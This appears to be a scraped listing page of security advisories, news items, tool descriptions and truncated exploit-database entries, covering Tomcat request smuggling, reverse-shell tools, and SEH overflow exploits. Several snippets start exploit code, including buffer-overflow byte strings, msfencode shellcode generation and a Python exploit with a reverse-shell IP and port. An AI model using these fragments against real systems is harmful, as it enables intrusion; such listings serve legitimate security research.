[SECURITY] Fedora 22 Update: rdiff-backup-1.2.8-14.fc22

rdiff-backup is a script, written in Python, that backs up one directory to another and is intended to be run periodically nightly from cron for instance. The target directory ends up a copy of the source directory, but extra reverse diffs are stored in the target directory, so you can still...

exploit_dev

Description...

Apache Tomcat 6.0.x < 6.0.40 Multiple Vulnerabilities

Binary data 8934.pasl...

Apache Tomcat 8.0.x < 8.0.4 Multiple Vulnerabilities

Binary data 8936.pasl...

Tomcat/JBossWeb: Request smuggling via malicious content length header

It was found that JBoss Web / Apache Tomcat did not check for overflowing values when parsing request content length headers. A remote attacker could use this flaw to perform an HTTP request smuggling attack on a JBoss Web / Apache Tomcat server located behind a reverse proxy that processed the...

Tomcat/JBossWeb: Request smuggling via malicious content length header

It was found that JBoss Web / Apache Tomcat did not check for overflowing values when parsing request content length headers. A remote attacker could use this flaw to perform an HTTP request smuggling attack on a JBoss Web / Apache Tomcat server located behind a reverse proxy that processed the...

Qt Weekly #26: Protecting your application against hacking

Open-source applications are open by nature, indented and encouraged for tweaking, hacking and further development. For a business critical application or a device there sometimes is desire to make it closed and prevent modifications. Because of the dual licensing, Qt offers a commercial license...

Reverse Shells With Terminal Support: revsh

revsh is a tool for establishing reverse shells with terminal support, reverse VPNs for advanced pivoting Pivoting , as well as arbitrary data tunneling. A reverse shell is a network connection that grants shell access to a remote host. As opposed to other remote login tools such as telnet and ss...

DNS Enumeration Script: DNSRecon

DNS reconnaissance is part of the information gathering stage on a penetration test engagement. When a penetration tester is performing a DNS reconnaissance he is trying to obtain as much information as he can regarding the DNS servers and their records. The information that can be gathered can...

Analysis of Flash Zero Day Shows Layers of Obfuscation

The Flash zero day that made its way into the Angler exploit kit was wrapped in multiple layers of obfuscation and has the ability to inject its malicious payload straight into users’ browsers. In the last week, since the news broke of the Adobe Flash zero-day flaw appearing in the Angler kit,...

Oracle Secure Global Desktop Multiple Vulnerabilities (January 2015 CPU) (POODLE)

The remote host has a version of Oracle Secure Global Desktop that is version 4.63, 4.71, 5.0 or 5.1. It is, therefore, affected by multiple vulnerabilities in the following components : - Apache HTTP Server - Client - Gateway JARP module - Gateway Reverse Proxy - OpenSSL - Print Servlet only in...

Exploit Pack - Open Source Security Project for Penetration Testing and Exploit Development

Exploit Pack, is an open source GPLv3 security tool, this means it is fully free and you can use it without any kind of restriction. Other security tools like Metasploit, Immunity Canvas, or Core Iimpact are ready to use as well but you will require an expensive license to get access to all the...

Thunderstrike Apple Mac OS X Firmware Bootkit Unveiled

A vulnerability at the heart of Apple’s Mac OS X systems—one thus far only partially addressed by Apple—opens the door to the installation of malicious firmware bootkits that resist cleanup and give hackers persistent, stealthy control over a compromised Mac. The research is the work of a reverse...

Rosoft-media-player-4.4.4

Original Advisory:http://www.exploit-db.com/exploits/14601 - abhishek lyall Download:http://www.exploit-db.com/application/14601/ Platform:Windows XP SP3 EN Professional - VMware outputfile="exploit.m3u" junk="\x41"3470 nseh="\xeb\x88\x90\x90" reverse jump 118 bytes seh="\x49\xd4\x46\x00" PPR -...

Pirelli Router P.DG-A4001N WPA Key Reverse Engineering

!/usr/bin/env python -- coding: utf-8 -- ''' @license: GPLv3 @author : Eduardo Novella @contact: ednoloainf.upv.es @twitter: @enovella ----------------- Target : ----------------- Vendor : ADB broadband Pirelli Router : Model P.DG-A4001N ISP : Arnet Telecom Argentina Possible-targets :...

Ophcrack-3.5.0---Local-Code

Exploit Author: xisone@STM Solutions Vendor Homepage: http://ophcrack.sourceforge.net/ Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-win32-installer-3.5.0.exe Version: 3.5.0 shellcode = windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alphamixed bufferregister=esp -t c...

Sitecom-MD-25x

Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin Version: 2.4.17 and below...

ManageEngine-5.5

The SQL injection is possible on the "Advanced Search", the input is not validated correctly. To make it even worse, the search can be accessed without any authentication. Security Manager Plus also has to run as root or SYSTEM user, which makes a remote shell with root/SYSTEM privileges...

BigAnt-Server-2.52-SP5-SEH

Exploit Title: BigAnt Server 2.52 SP5 SEH Stack Overflow ROP-based exploit ASLR + DEP bypass Date: 03/11/2012 Exploit Author: Lorenzo Cantoni Vendor Homepage: http://www.bigantsoft.com/ Version: BigAnt Console 2.52 SP5 Tested on: Windows 7 SP0 x86 Italian - expsrv.dll 6.0.9589 Info: Vulnerability...

python-socket.recvfrom_into()

Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-1912 import struct def offo: return struct.pack'L',o reverseIP = '\xc0\xa8\x04\x34' '\xc0\xa8\x01\x0a' reversePort = '\x7a\x69' shellcode from exploit-db.com,...